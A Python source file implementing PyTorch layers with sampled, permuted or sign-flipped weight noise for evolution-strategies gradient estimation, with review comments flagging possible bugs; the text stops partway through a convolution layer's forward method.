text stringlengths 38 1.54M |
|---|
import torch
from torch import nn
import torch.nn.functional as F
import torch.nn.modules.utils as module_utils
import time
import random
class PerturbedModel:
    """Wrapper around a model whose submodules mix in `Perturbed`.

    Collects all perturbed layers once at construction, then toggles their
    `perturbed_flag` around forwarded calls and broadcasts Perturbed-API
    calls (set_noise, free_memory, ...) to every perturbed layer.
    """
    def __init__(self, model, directions):
        self.model = model
        self.directions = directions
        self.perturbed_layers = []
        # Gather every submodule that mixes in Perturbed so flags can be
        # flipped in bulk later.
        def get_perturbed_layers(m):
            if isinstance(m, Perturbed):
                self.perturbed_layers += [m]
        self.model.apply(get_perturbed_layers)

    def forward(self, input, *args):
        """Run the wrapped model's forward with perturbations enabled.

        Fix: flags are restored in a finally-block, so an exception in the
        underlying forward cannot leave layers stuck in perturbed mode.
        """
        for l in self.perturbed_layers:
            l.perturbed_flag = True
        try:
            return self.model.forward(input, *args)
        finally:
            for l in self.perturbed_layers:
                l.perturbed_flag = False

    def __getattr__(self, name):
        # Only invoked for names not found on the wrapper itself.
        def ret(*args, **kwargs):
            if hasattr(Perturbed, name):
                # Broadcast Perturbed-API methods to every perturbed layer;
                # these calls return None (matching the original behavior).
                for l in self.perturbed_layers:
                    getattr(l, name)(*args, **kwargs)
            else:
                # Forward anything else to the model with perturbations on;
                # restore the flags even if the delegated call raises.
                for l in self.perturbed_layers:
                    l.perturbed_flag = True
                try:
                    return getattr(self.model, name)(*args, **kwargs)
                finally:
                    for l in self.perturbed_layers:
                        l.perturbed_flag = False
        return ret
class Perturbed:
    """Mixin adding sampled-noise buffers to a layer that defines
    `self.weight` / `self.bias` (supplied by the concrete nn.Module).

    options["direct"]=True stores weight + noise together in the noise
    buffers so a forward pass can use them directly.
    """
    def __init__(self, directions, antithetic=False, options=None):
        self.directions = directions
        self.perturbed_flag = False
        self.noise_scale = None
        self.seed = None
        self.antithetic = antithetic
        # Fix: None sentinel instead of a mutable `{}` default — a shared
        # default dict would leak option changes across instances.
        self.options = {} if options is None else options
        self.free_memory()

    def set_noise_scale(self, noise_scale):
        self.noise_scale = noise_scale

    def set_noise(self, noise_scale=None):
        """(Re)sample the noise buffers from the stored seed.

        Buffers are allocated lazily on first use.  In "direct" mode the
        buffers hold weight + noise, with antithetic pairs mirroring the
        first half; otherwise they hold pure noise and antithetic negation
        is applied at forward time by the concrete layers.
        """
        if self.seed is None:
            self.set_seed()
        if noise_scale is not None:
            self.set_noise_scale(noise_scale)
        if self.weight_noise is None:
            self.allocate_memory()
        gen = torch.cuda.manual_seed(self.seed)
        if self.options.get("direct"):
            if self.antithetic:
                self.weight_noise[:self.directions // 2].normal_(std=self.noise_scale, generator=gen)
                self.weight_noise[self.directions // 2:] = -self.weight_noise[:self.directions // 2]
                self.weight_noise += self.weight
                if self.bias is not None:
                    self.bias_noise[:self.directions // 2].normal_(std=self.noise_scale, generator=gen)
                    self.bias_noise[self.directions // 2:] = -self.bias_noise[:self.directions // 2]
                    self.bias_noise += self.bias
            else:
                self.weight_noise.normal_(std=self.noise_scale, generator=gen)
                self.weight_noise += self.weight
                if self.bias is not None:
                    self.bias_noise.normal_(std=self.noise_scale, generator=gen)
                    self.bias_noise += self.bias
        else:
            self.weight_noise.normal_(std=self.noise_scale, generator=gen)
            if self.bias is not None:
                self.bias_noise.normal_(std=self.noise_scale, generator=gen)

    def set_seed(self, seed=None):
        # A stored seed keeps resampling reproducible between calls.
        self.seed = seed if seed is not None else random.randrange(100000000)

    def allocate_weight(self):
        # One independent noise sample per direction.
        self.weight_noise = torch.empty((self.directions, ) + self.weight.size(),
                                        device=self.weight.device, dtype=self.weight.dtype)

    def allocate_bias(self):
        if self.bias is not None:
            self.bias_noise = torch.empty((self.directions, ) + self.bias.size(),
                                          device=self.bias.device, dtype=self.bias.dtype)

    def allocate_memory(self):
        self.allocate_weight()
        if self.bias is not None:
            self.allocate_bias()

    def free_memory(self):
        self.weight_noise = None
        if self.bias is not None:
            self.bias_noise = None

    def weight_grad(self, weights):
        """Combine per-direction scalar `weights` with the noise into a
        gradient estimate shaped like `self.weight`."""
        if self.options.get("direct"):
            # Direct buffers store weight + noise; subtract the weight out.
            if self.antithetic:
                # NOTE(review): this slice has directions//2 rows but is
                # re-viewed as `directions` rows below — confirm intended.
                weight_noise = self.weight_noise[self.directions // 2:] - self.weight
            else:
                weight_noise = self.weight_noise - self.weight
        else:
            weight_noise = self.weight_noise
        return (weights @ weight_noise.view(self.directions, -1)).view(*self.weight.size())

    def update(self, weights, l1=0, l2=0):
        """Accumulate estimated gradients (plus optional L1/L2 penalty
        terms) into `.grad` of weight and bias.

        Returns (grad, bias_grad) when a bias exists, else grad alone.
        """
        grad = self.weight_grad(weights)
        if l1:
            grad += l1 * torch.sign(self.weight)
        if l2:
            grad += l2 * self.weight
        self.weight.grad = grad if self.weight.grad is None else self.weight.grad + grad
        if self.bias is not None:
            if self.options.get("direct"):
                if self.antithetic:
                    bias_noise = self.bias_noise[self.directions // 2:] - self.bias
                else:
                    bias_noise = self.bias_noise - self.bias
            else:
                bias_noise = self.bias_noise
            bias_grad = (weights @ bias_noise.view(self.directions, -1)).view(*self.bias.size())
            self.bias.grad = bias_grad if self.bias.grad is None else self.bias.grad + bias_grad
            return grad, bias_grad
        return grad
class Permuted(Perturbed):
    """Perturbation mixin that reuses one small shared noise matrix across
    directions by permuting its rows/columns with per-direction permutations.

    options["allow_repeats"]: faster sampling, as pytorch currently doesn't
    have parallel sampling for permutations; it allows an input or output
    index to be sampled with replacement.
    """
    def __init__(self, in_degree, out_degree, directions, antithetic=False, options={}, permutation="auto",
                 in_sparsity=0, out_sparsity=0):
        Perturbed.__init__(self, directions, antithetic, options)
        # Resolve "auto": prefer permuting the sparse side(s); for small
        # dense layers permute both; otherwise permute the larger dimension.
        if permutation == "auto":
            if in_sparsity:
                if out_sparsity:
                    permutation = "both"
                else:
                    permutation = "in"
            elif out_sparsity:
                permutation = "out"
            elif 1 < in_degree < 32 and 1 < out_degree < 32:
                permutation = "both"
            elif in_degree > out_degree:
                permutation = "in"
            else:
                permutation = "out"
        if permutation == "both":
            self.permute_inputs = True
            self.permute_outputs = True
        elif permutation == "in":
            self.permute_inputs = True
            self.permute_outputs = False
        elif permutation == "out":
            self.permute_inputs = False
            self.permute_outputs = True
        else:
            raise NotImplementedError("Permutation setting not recognized")
        self.in_degree = in_degree
        self.out_degree = out_degree
        # A float sparsity is a fraction of the degree; an int is an
        # absolute count; 0 means dense (sparsity == degree).
        self.in_sparsity = max(1, int(in_sparsity * self.in_degree)) if isinstance(in_sparsity, float) else in_sparsity
        if self.in_sparsity:
            self.permute_inputs = True
        else:
            self.in_sparsity = self.in_degree
        self.out_sparsity = max(1, int(out_sparsity * self.out_degree)) if isinstance(out_sparsity, float) else out_sparsity
        if self.out_sparsity:
            self.permute_outputs = True
        else:
            self.out_sparsity = self.out_degree
        if options.get("combined") and self.permute_inputs and self.permute_outputs:
            raise NotImplementedError("Can't do combined multiplication with both input and output permutations")

    def allocate_weight(self):
        # One shared (out_sparsity, in_sparsity, ...) noise tensor reused by
        # every direction, instead of a per-direction copy.
        self.weight_noise = torch.empty(self.out_sparsity, self.in_sparsity, *self.weight.shape[2:],
                                        device=self.weight.device, dtype=self.weight.dtype)

    def free_memory(self):
        Perturbed.free_memory(self)
        self.input_permutations = None
        self.output_permutations = None

    def set_noise(self, noise_scale=None):
        """Sample the shared noise matrix and the per-direction permutations."""
        if self.seed is None:
            self.set_seed()
        if noise_scale is not None:
            self.set_noise_scale(noise_scale)
        if self.weight_noise is None:
            self.allocate_memory()
        gen = torch.cuda.manual_seed(self.seed)
        # Compensate the std so a sparse sub-matrix carries the same total
        # variance a dense perturbation would.
        rescale = (self.out_degree * self.in_degree / self.out_sparsity / self.in_sparsity) ** .5
        self.weight_noise.normal_(std=self.noise_scale * rescale, generator=gen)
        if self.bias is not None:
            self.bias_noise.normal_(std=self.noise_scale, generator=gen)
        if self.options.get("allow_repeats"):
            # Fast path: sample indices with replacement directly on device.
            if self.permute_outputs:
                self.output_permutations = torch.randint(self.out_degree,
                                                         (self.directions, self.out_degree), dtype=torch.short, generator=gen, device=self.weight.device)
            if self.permute_inputs:
                self.input_permutations = torch.randint(self.in_degree,
                                                        (self.directions, self.in_sparsity), dtype=torch.short, generator=gen, device=self.weight.device)
        else:
            # True permutations are drawn one by one on CPU (randperm has no
            # batched form), then moved to the weight's device.
            gen = torch.manual_seed(self.seed)
            if self.permute_outputs:
                self.output_permutations = torch.empty(self.directions, self.out_degree, dtype=torch.short)
                for i in range(self.directions):
                    torch.randperm(self.out_degree, out=self.output_permutations[i], generator=gen)
                self.output_permutations = self.output_permutations.to(self.weight.device)
            if self.permute_inputs:
                self.input_permutations = torch.empty(self.directions, self.in_degree, dtype=torch.short)
                for i in range(self.directions):
                    torch.randperm(self.in_degree, out=self.input_permutations[i], generator=gen)
                # Keep only the first in_sparsity entries of each permutation.
                self.input_permutations = self.input_permutations[:, :self.in_sparsity].to(self.weight.device)

    def apply_input_permutation(self, input):
        """Gather each direction's permuted columns from dim 1 of a
        (batch, directions * in_degree) view of the input."""
        if self.permute_inputs:
            # Offset each direction's indices into its own slice of dim 1.
            input_permutations_1d = (self.input_permutations + (torch.arange(self.directions, device=input.device) * self.in_degree).unsqueeze(1)).flatten()
            return torch.index_select(input, 1, input_permutations_1d)
        return input

    def apply_output_permutation(self, output):
        """Scatter/gather each direction's output entries analogously to
        apply_input_permutation, along dim 1."""
        if self.permute_outputs:
            output_permutations_1d = (self.output_permutations + (torch.arange(self.directions, device=output.device) * self.out_degree).unsqueeze(1)).flatten()
            return torch.index_select(output, 1, output_permutations_1d)
        return output

    def get_permutation_weights(self, weights):
        """Accumulate per-direction scalar `weights` into a matrix mapping
        shared-noise entries to weight entries under the sampled
        permutations (used by the concrete layers' weight_grad)."""
        if self.permute_inputs and self.permute_outputs:
            # Invert the output permutation and truncate to the sparse rows.
            inverse_out = torch.argsort(self.output_permutations, dim=1)[:, :self.out_sparsity]
            sp_size = self.out_sparsity * self.in_sparsity
            mat_size = self.out_degree * self.in_degree
            permutations = self.input_permutations.view(self.directions, 1, self.in_sparsity) + \
                (inverse_out * self.in_sparsity).view(self.directions, self.out_sparsity, 1)
            ar = torch.arange(sp_size, device=self.weight.device)
            permutations_1d = permutations.view(self.directions, sp_size) + ar * mat_size
            weighted_perms = torch.zeros((sp_size, mat_size), device=self.weight.device, dtype=self.weight.dtype)
            # put_ with accumulate=True sums direction weights mapping to the
            # same (noise entry, weight entry) pair.
            weighted_perms.put_(permutations_1d, weights.view(-1, 1).expand(self.directions, sp_size), accumulate=True)
            weighted_perms = weighted_perms.t()
        elif self.permute_inputs:
            weighted_perms = torch.zeros((self.in_sparsity, self.in_degree), device=self.weight.device, dtype=self.weight.dtype)
            ar = torch.arange(self.in_sparsity, device=self.weight.device)
            input_permutations_1d = self.input_permutations + ar * self.in_degree
            weighted_perms.put_(input_permutations_1d, weights.view(-1, 1).expand(self.directions, self.in_sparsity), accumulate=True)
        else:
            weighted_perms = torch.zeros((self.out_degree, self.out_degree), device=self.weight.device, dtype=self.weight.dtype)
            ar = torch.arange(self.out_degree, device=self.weight.device)
            output_permutations_1d = self.output_permutations + ar * self.out_degree
            weighted_perms.put_(output_permutations_1d, weights.view(-1, 1).expand(self.directions, self.out_degree), accumulate=True)
            weighted_perms = weighted_perms[:, :self.out_sparsity]
        return weighted_perms
class Synthetic(Perturbed):
    """Perturbation mixin that reuses one shared noise matrix across
    directions by applying random per-direction +/-1 sign flips to inputs
    and/or outputs."""
    def __init__(self, in_degree, out_degree, directions, antithetic=False, options={},
                 flip="auto", in_sparsity=0, out_sparsity=0):
        Perturbed.__init__(self, directions, antithetic, options)
        # Resolve "auto": flip both sides for small layers, otherwise flip
        # the larger dimension.
        if flip == "auto":
            if 1 < in_degree < 32 and 1 < out_degree < 32:
                flip = "both"
            elif in_degree > out_degree:
                flip = "in"
            else:
                flip = "out"
        if flip == "both":
            self.flip_inputs = True
            self.flip_outputs = True
        elif flip == "in":
            self.flip_inputs = True
            self.flip_outputs = False
        elif flip == "out":
            self.flip_inputs = False
            self.flip_outputs = True
        else:
            raise NotImplementedError("Flip setting not recognized")
        self.in_degree = in_degree
        self.out_degree = out_degree
        if in_sparsity or out_sparsity:
            raise NotImplementedError("Sparsity is not efficient for synthetic sampling, use permuted sampling instead")
        # Sparsity always equals the degree for synthetic sampling.
        self.in_sparsity = self.in_degree
        self.out_sparsity = self.out_degree
        if options.get("combined") and self.flip_inputs and self.flip_outputs:
            raise NotImplementedError("Can't do combined multiplication with both input and output flips")

    def allocate_weight(self):
        # One shared noise matrix for all directions.
        self.weight_noise = torch.empty(self.out_sparsity, self.in_sparsity, *self.weight.shape[2:],
                                        device=self.weight.device, dtype=self.weight.dtype)

    def free_memory(self):
        Perturbed.free_memory(self)
        self.input_flips = None
        self.output_flips = None

    def set_noise(self, noise_scale=None):
        """Sample the shared noise matrix plus per-direction +/-1 flip masks."""
        if self.seed is None:
            self.set_seed()
        if noise_scale is not None:
            self.set_noise_scale(noise_scale)
        if self.weight_noise is None:
            self.allocate_memory()
        gen = torch.cuda.manual_seed(self.seed)
        # With sparsity == degree this rescale factor is always 1; kept for
        # symmetry with Permuted.set_noise.
        rescale = (self.out_degree * self.in_degree / self.out_sparsity / self.in_sparsity) ** .5
        self.weight_noise.normal_(std=self.noise_scale * rescale, generator=gen)
        if self.bias is not None:
            self.bias_noise.normal_(std=self.noise_scale, generator=gen)
        if self.flip_outputs:
            # Map {0,1} draws to {-1,+1} signs.
            self.output_flips = 2 * torch.randint(2, size=(self.directions, self.out_degree), dtype=torch.int8,
                                                  generator=gen, device=self.weight.device) - 1
        if self.flip_inputs:
            self.input_flips = 2 * torch.randint(2, size=(self.directions, self.in_degree), dtype=torch.int8,
                                                 generator=gen, device=self.weight.device) - 1

    def get_flipped_weights(self, weights):
        """Aggregate per-direction scalar `weights` into flip-weighted masks."""
        if self.flip_inputs and self.flip_outputs:
            # NOTE(review): `weights` enters this einsum twice (once as the
            # "d" operand, once scaling input_flips) — confirm the quadratic
            # weighting is intended rather than a double application.
            return torch.einsum("d,da,db->ab", weights, self.output_flips, self.input_flips * weights.unsqueeze(1))
        elif self.flip_inputs:
            return (self.input_flips * weights.unsqueeze(1)).sum(dim=0)
        else:
            return (self.output_flips * weights.unsqueeze(1)).sum(dim=0)

    def weight_grad(self, weights):
        """Gradient estimate: the flip-weighted mask broadcast onto the
        shared noise matrix, reshaped to self.weight's rank."""
        if self.flip_inputs and self.flip_outputs:
            # NOTE(review): same double use of `weights` as in
            # get_flipped_weights — confirm intended.
            flipped_weights = torch.einsum("d,da,db->ab", weights, self.output_flips, self.input_flips * weights.unsqueeze(1))
            for _ in range(len(self.weight.shape) - 2):
                flipped_weights = flipped_weights.unsqueeze(-1)
        elif self.flip_inputs:
            flipped_weights = (self.input_flips * weights.unsqueeze(1)).sum(dim=0).view(1, -1, *[1] * (len(self.weight.shape) - 2))
        else:
            flipped_weights = (self.output_flips * weights.unsqueeze(1)).sum(dim=0).view(-1, *[1] * (len(self.weight.shape) - 1))
        return flipped_weights * self.weight_noise
class PerturbedLinear(nn.Linear, Perturbed):
    """nn.Linear whose forward can add per-direction weight/bias noise.

    Inputs are viewed as (repeat, directions, in_features) so each
    direction is matched with its own noise sample via batched matmul.
    """
    def __init__(self, in_features, out_features, directions, bias=True, antithetic=False, options={}):
        nn.Linear.__init__(self, in_features, out_features, bias)
        Perturbed.__init__(self, directions, antithetic, options)

    def forward(self, input):
        if self.options.get("direct") and self.perturbed_flag:
            # Direct mode: weight_noise/bias_noise already hold weight +
            # noise, so the batched matmul is the full perturbed output.
            input_by_direction = input.view(-1, self.directions, self.in_features).permute([1, 0, 2])
            if self.bias is not None:
                return torch.baddbmm(self.bias_noise.view(self.directions, 1, self.out_features),
                                     input_by_direction,
                                     self.weight_noise.permute([0, 2, 1])).permute([1, 0, 2])
            else:
                return torch.bmm(input_by_direction,
                                 self.weight_noise.permute([0, 2, 1])).permute([1, 0, 2])
        else:
            unperturbed = F.linear(input, self.weight, self.bias)
            if self.perturbed_flag:
                # Add the per-direction noise contribution on top of the
                # unperturbed output.
                input_by_direction = input.view(-1, self.directions, self.in_features).permute([1, 0, 2])
                repeat_size = input_by_direction.size(1)
                if self.bias is not None:
                    perturbations = torch.baddbmm(self.bias_noise.view(self.directions, 1, self.out_features),
                                                  input_by_direction,
                                                  self.weight_noise.permute([0, 2, 1])).permute([1, 0, 2])
                else:
                    perturbations = torch.bmm(input_by_direction,
                                              self.weight_noise.permute([0, 2, 1])).permute([1, 0, 2])
                if self.antithetic:
                    # Second half of the repeats uses mirrored (negated) noise.
                    perturbations[(repeat_size + 1) // 2:] *= -1
                add = (unperturbed.view_as(perturbations) + perturbations).view_as(unperturbed)
                return add
            return unperturbed
class PerturbedConv2d(nn.Conv2d, Perturbed):
    """nn.Conv2d with per-direction noise, implemented as one grouped
    convolution over (directions * in_channels) channels.

    based on https://github.com/pytorch/pytorch/issues/17983
    """
    def __init__(self, in_channels, out_channels, kernel_size, directions, stride=1,
                 padding=0, dilation=1, groups=1,
                 bias=True, antithetic=False, options={}, padding_mode='zeros'):
        nn.Conv2d.__init__(self, in_channels, out_channels, kernel_size, stride, padding, dilation, groups, bias, padding_mode)
        Perturbed.__init__(self, directions, antithetic, options)

    def forward(self, input):
        # Non-zero padding modes are handled by padding manually first.
        if self.padding_mode != 'zeros':
            input = F.pad(input, self._padding_repeated_twice, mode=self.padding_mode)
            padding = module_utils._pair(0)
        else:
            padding = self.padding
        if self.options.get("direct") and self.perturbed_flag:
            # NOTE(review): bias_noise is built here but F.conv2d below is
            # passed None — confirm whether direct mode should add the bias.
            bias_noise = self.bias_noise.view(-1) if self.bias is not None else None
            input_view = input.view(-1, self.directions * self.in_channels, *input.size()[-2:])
            repeat_size = input_view.size(0)
            # NOTE(review): the explicit synchronize() calls look like
            # profiling/debugging leftovers; not needed for correctness.
            torch.cuda.synchronize()
            perturbations = F.conv2d(input_view, self.weight_noise.view(-1, *self.weight.size()[1:]), None, self.stride,
                                     padding, self.dilation, self.groups * self.directions)
            torch.cuda.synchronize()
            return perturbations.view(repeat_size, self.directions, self.out_channels, *perturbations.shape[-2:])
        else:
            unperturbed = F.conv2d(input, self.weight, self.bias, self.stride,
                                   padding, self.dilation, self.groups)
            if self.perturbed_flag:
                bias_noise = self.bias_noise.view(-1) if self.bias is not None else None
                input_view = input.view(-1, self.directions * self.in_channels, *input.size()[-2:])
                repeat_size = input_view.size(0)
                # Grouped conv applies each direction's noise kernel to its
                # own channel slice in a single call.
                perturbations = F.conv2d(input_view, self.weight_noise.view(-1, *self.weight.size()[1:]), bias_noise, self.stride,
                                         padding, self.dilation, self.groups * self.directions)
                perturbations = perturbations.view(repeat_size, self.directions, self.out_channels,
                                                   *perturbations.size()[-2:])
                if self.antithetic:
                    # Mirrored noise for the second half of the repeats.
                    perturbations[(repeat_size + 1) // 2:] *= -1
                add = unperturbed + perturbations.view_as(unperturbed)
                return add
            return unperturbed
class PerturbedAffine(nn.Module, Perturbed):
    """Elementwise affine transform y = x * weight + bias with perturbed
    parameters; only the "direct" noise mode is supported."""
    def __init__(self, normalized_shape, directions, antithetic=False, options=None):
        nn.Module.__init__(self)
        self.weight = nn.Parameter(torch.ones(normalized_shape))
        self.bias = nn.Parameter(torch.zeros(normalized_shape))
        # Fix: None sentinel instead of a mutable dict default — a shared
        # default {"direct": True} dict could be mutated by one instance and
        # silently affect every later construction.
        if options is None:
            options = {"direct": True}
        if not options.get("direct"):
            raise NotImplementedError("Only direct is implemented")
        Perturbed.__init__(self, directions, antithetic=antithetic, options=options)

    def forward(self, input):
        if self.perturbed_flag:
            # Direct mode: noise buffers already hold weight + noise.
            weight = self.weight_noise
            bias = self.bias_noise
        else:
            weight = self.weight
            bias = self.bias
        return input * weight + bias
class PermutedLinear(nn.Linear, Permuted):
    """nn.Linear drawing per-direction perturbations from one shared noise
    matrix whose rows/columns are permuted per direction."""
    def __init__(self, in_features, out_features, directions, bias=True, antithetic=False, options={},
                 permutation="auto", in_sparsity=0, out_sparsity=0):
        nn.Linear.__init__(self, in_features, out_features, bias)
        Permuted.__init__(self, in_features, out_features, directions,
                          antithetic=antithetic, options=options,
                          permutation=permutation, in_sparsity=in_sparsity, out_sparsity=out_sparsity)

    def forward(self, input):
        if self.options.get("combined") and self.perturbed_flag:
            # "combined" fuses unperturbed and perturbed matmuls in one call.
            if self.permute_inputs:
                input_view = input.view(-1, self.directions * self.in_features)
                permuted_input = self.apply_input_permutation(input_view).view(-1, self.in_sparsity)
                combined_input = torch.cat([input.view(-1, self.in_features), permuted_input], dim=1)
                combined_weights = torch.cat([self.weight, self.weight_noise], dim=1)
                combined_bias = self.bias
                return F.linear(combined_input, combined_weights, combined_bias)
            elif self.permute_outputs:
                input_view = input.view(-1, self.in_features)
                repeat_size = input_view.size(0) // self.directions
                combined_weights = torch.cat([self.weight, self.weight_noise], dim=0)
                # NOTE(review): "or True" forces the zero-padded path and
                # makes the else branch dead code — likely a debugging
                # leftover; confirm before removing.
                if self.out_sparsity < self.out_degree or True:
                    combined_output = torch.zeros((repeat_size, self.directions * self.out_features, 2), device=input.device, dtype=input.dtype)
                    torch.mm(input_view, combined_weights.t(), out=combined_output.view(-1, 2 * self.out_features)[:, :self.out_features + self.out_sparsity])
                else:
                    combined_output = torch.mm(input_view, combined_weights.t())
                # Channel 1 holds the raw perturbations, channel 0 the
                # unperturbed output.
                perturbations = combined_output[:, :, 1].view(repeat_size, self.directions * self.out_features)
                permuted_output = self.apply_output_permutation(perturbations).view(repeat_size,
                                                                                    self.directions, self.out_features)
                if self.bias is not None:
                    permuted_output += self.bias_noise
                if self.antithetic:
                    permuted_output[(repeat_size + 1) // 2:] *= -1
                add = combined_output[:, :, 0].view(-1, self.out_features) + permuted_output.view(-1, self.out_features)
                if self.bias is not None:
                    add += self.bias
                return add
        else:
            unperturbed = F.linear(input, self.weight, self.bias)
            if self.perturbed_flag:
                input_view = input.view(-1, self.directions * self.in_features)
                repeat_size = input_view.size(0)
                permuted_input = self.apply_input_permutation(input_view).view(-1, self.in_sparsity)
                if self.out_sparsity < self.out_degree:
                    # Sparse outputs: write noise into the first out_sparsity
                    # columns, leaving the rest zero before permuting.
                    perturbations = torch.zeros_like(unperturbed)
                    torch.mm(permuted_input, self.weight_noise.t(), out=perturbations.view(-1, self.out_features)[:, :self.out_sparsity])
                    perturbations = perturbations.view(repeat_size,
                                                       self.directions * self.out_features)
                else:
                    perturbations = torch.mm(permuted_input, self.weight_noise.t()).view(repeat_size,
                                                                                         self.directions * self.out_features)
                permuted_output = self.apply_output_permutation(perturbations).view(repeat_size, self.directions, self.out_features)
                if self.bias is not None:
                    permuted_output += self.bias_noise
                if self.antithetic:
                    permuted_output[(repeat_size + 1) // 2:] *= -1
                add = unperturbed + permuted_output.view_as(unperturbed)
                return add
            return unperturbed

    def weight_grad(self, weights):
        """Fold per-direction weights through the permutations to recover a
        gradient estimate shaped like self.weight."""
        permutation_weights = self.get_permutation_weights(weights)
        if self.permute_inputs and self.permute_outputs:
            return torch.mm(permutation_weights, self.weight_noise.view(-1, 1)).reshape(self.out_features, self.in_features)
        elif self.permute_inputs:
            return torch.mm(self.weight_noise, permutation_weights)
        else:
            return torch.mm(permutation_weights, self.weight_noise)
class PermutedConv2d(nn.Conv2d, Permuted):
    """nn.Conv2d drawing per-direction perturbations from one shared noise
    kernel whose channels are permuted per direction."""
    def __init__(self, in_channels, out_channels, kernel_size, directions, stride=1,
                 padding=0, dilation=1, groups=1,
                 bias=True, antithetic=False, options={},
                 padding_mode='zeros', permutation="auto", in_sparsity=0, out_sparsity=0):
        nn.Conv2d.__init__(self, in_channels, out_channels, kernel_size, stride, padding, dilation, groups, bias, padding_mode)
        Permuted.__init__(self, in_channels, out_channels, directions,
                          antithetic=antithetic, options=options,
                          permutation=permutation, in_sparsity=in_sparsity, out_sparsity=out_sparsity)

    def forward(self, input):
        # Non-zero padding modes are handled by padding manually first.
        if self.padding_mode != 'zeros':
            input = F.pad(input, self._padding_repeated_twice, mode=self.padding_mode)
            padding = module_utils._pair(0)
        else:
            padding = self.padding
        if self.options.get("combined") and self.perturbed_flag:
            # NOTE(review): with combined + output permutation (no input
            # permutation) this branch falls through and returns None —
            # confirm whether that combination should raise instead.
            if self.permute_inputs:
                input_dims = input.shape[-2:]
                input_view = input.view(-1, self.directions * self.in_channels, *input_dims)
                repeat_size = input_view.size(0)
                permuted_input = self.apply_input_permutation(input_view).view(-1, self.in_sparsity, *input_dims)
                if self.antithetic:
                    # Negate the inputs (rather than the outputs) for the
                    # mirrored half of the repeats.
                    permuted_input.view(repeat_size, self.directions, self.in_sparsity, *input_dims)[(repeat_size + 1) // 2:] *= -1
                combined_input = torch.cat([input.view(-1, self.in_channels, *input_dims), permuted_input], dim=1)
                combined_weights = torch.cat([self.weight, self.weight_noise], dim=1)
                result = F.conv2d(combined_input, combined_weights, self.bias, self.stride,
                                  padding, self.dilation, self.groups)
                if self.bias is not None:
                    if self.antithetic:
                        # Since the inputs were negated above, the bias noise
                        # is added to the first half and subtracted from the
                        # mirrored half.
                        result.view(repeat_size, self.directions, *result.shape[1:])[:(repeat_size + 1) // 2] += self.bias_noise.unsqueeze(-1).unsqueeze(-1)
                        result.view(repeat_size, self.directions, *result.shape[1:])[(repeat_size + 1) // 2:] -= self.bias_noise.unsqueeze(-1).unsqueeze(-1)
                    else:
                        return result + self.bias_noise.unsqueeze(-1).unsqueeze(-1)
                return result
        else:
            unperturbed = F.conv2d(input, self.weight, self.bias, self.stride,
                                   padding, self.dilation, self.groups)
            if self.perturbed_flag:
                input_dims = input.shape[-2:]
                output_dims = unperturbed.shape[-2:]
                input_view = input.view(-1, self.directions * self.in_channels, *input_dims)
                repeat_size = input_view.size(0)
                permuted_input = self.apply_input_permutation(input_view).view(-1, self.in_sparsity, *input_dims)
                if self.out_sparsity < self.out_degree:
                    # Sparse outputs: fill only the first out_sparsity
                    # channels, leaving the rest zero before permuting.
                    perturbations = torch.zeros_like(unperturbed)
                    perturbations.view(-1, self.out_channels, *output_dims)[:, :self.out_sparsity] = \
                        F.conv2d(permuted_input, self.weight_noise, None, self.stride, padding, self.dilation, self.groups)
                else:
                    perturbations = F.conv2d(permuted_input, self.weight_noise, None, self.stride,
                                             padding, self.dilation, self.groups)
                permuted_output = self.apply_output_permutation(perturbations.view(repeat_size, self.directions * self.out_channels,
                                                                                   *perturbations.shape[-2:])).view_as(unperturbed)
                if self.bias is not None:
                    permuted_output += self.bias_noise.unsqueeze(-1).unsqueeze(-1)
                if self.antithetic:
                    permuted_output.view(repeat_size, -1)[(repeat_size + 1) // 2:] *= -1
                add = unperturbed + permuted_output
                return add
            return unperturbed

    def weight_grad(self, weights):
        """Fold per-direction weights through the permutations into a
        gradient estimate shaped like self.weight."""
        permutation_weights = self.get_permutation_weights(weights)
        if self.permute_inputs and self.permute_outputs:
            sp_size = self.out_sparsity * self.in_sparsity
            return torch.mm(permutation_weights, self.weight_noise.view(sp_size, -1)).view_as(self.weight)
        elif self.permute_inputs:
            # Move the input-channel dim last so the permutation matrix can
            # be applied with a single mm, then restore the conv layout.
            return torch.mm(self.weight_noise.permute([0, 2, 3, 1]).contiguous().view(-1, self.in_sparsity),
                            permutation_weights).view(self.out_channels, *self.kernel_size, self.in_channels).permute([0, 3, 1, 2])
        else:
            return torch.mm(permutation_weights, self.weight_noise.view(self.out_sparsity, -1)).view_as(self.weight)
class SyntheticLinear(nn.Linear, Synthetic):
    """nn.Linear whose per-direction noise is one shared matrix combined
    with random per-direction sign flips on inputs/outputs."""
    def __init__(self, in_features, out_features, directions, bias=True, antithetic=False, options={},
                 flip="auto", in_sparsity=0, out_sparsity=0):
        nn.Linear.__init__(self, in_features, out_features, bias)
        Synthetic.__init__(self, in_features, out_features, directions,
                           antithetic=antithetic, options=options,
                           flip=flip, in_sparsity=in_sparsity, out_sparsity=out_sparsity)

    def forward(self, input):
        if self.options.get("combined") and self.perturbed_flag:
            # NOTE(review): the "combined" path is unimplemented; with this
            # option enabled and the flag set, forward falls through and
            # returns None — confirm whether it should raise instead.
            pass
        else:
            unperturbed = F.linear(input, self.weight, self.bias)
            if self.perturbed_flag:
                input_view = input.view(-1, self.directions, self.in_features)
                repeat_size = input_view.size(0)
                # Flip input signs per direction, multiply by the shared
                # noise matrix, then flip output signs.
                flipped_input = input_view * self.input_flips if self.flip_inputs else input_view
                perturbations = flipped_input @ self.weight_noise.t()
                flipped_output = (perturbations * self.output_flips if self.flip_outputs else perturbations)
                if self.bias is not None:
                    flipped_output += self.bias_noise
                if self.antithetic:
                    flipped_output[(repeat_size + 1) // 2:] *= -1
                add = unperturbed + flipped_output.view_as(unperturbed)
                return add
            return unperturbed
class SyntheticConv2d(nn.Conv2d, Synthetic):
    """nn.Conv2d whose per-direction noise is one shared kernel combined
    with random per-direction sign flips on input/output channels."""
    def __init__(self, in_channels, out_channels, kernel_size, directions, stride=1,
                 padding=0, dilation=1, groups=1,
                 bias=True, antithetic=False, options={},
                 padding_mode='zeros', flip="auto", in_sparsity=0, out_sparsity=0):
        nn.Conv2d.__init__(self, in_channels, out_channels, kernel_size, stride, padding, dilation, groups, bias, padding_mode)
        Synthetic.__init__(self, in_channels, out_channels, directions,
                           antithetic=antithetic, options=options,
                           flip=flip, in_sparsity=in_sparsity, out_sparsity=out_sparsity)

    def forward(self, input):
        # Non-zero padding modes are handled by padding manually first.
        if self.padding_mode != 'zeros':
            input = F.pad(input, self._padding_repeated_twice, mode=self.padding_mode)
            padding = module_utils._pair(0)
        else:
            padding = self.padding
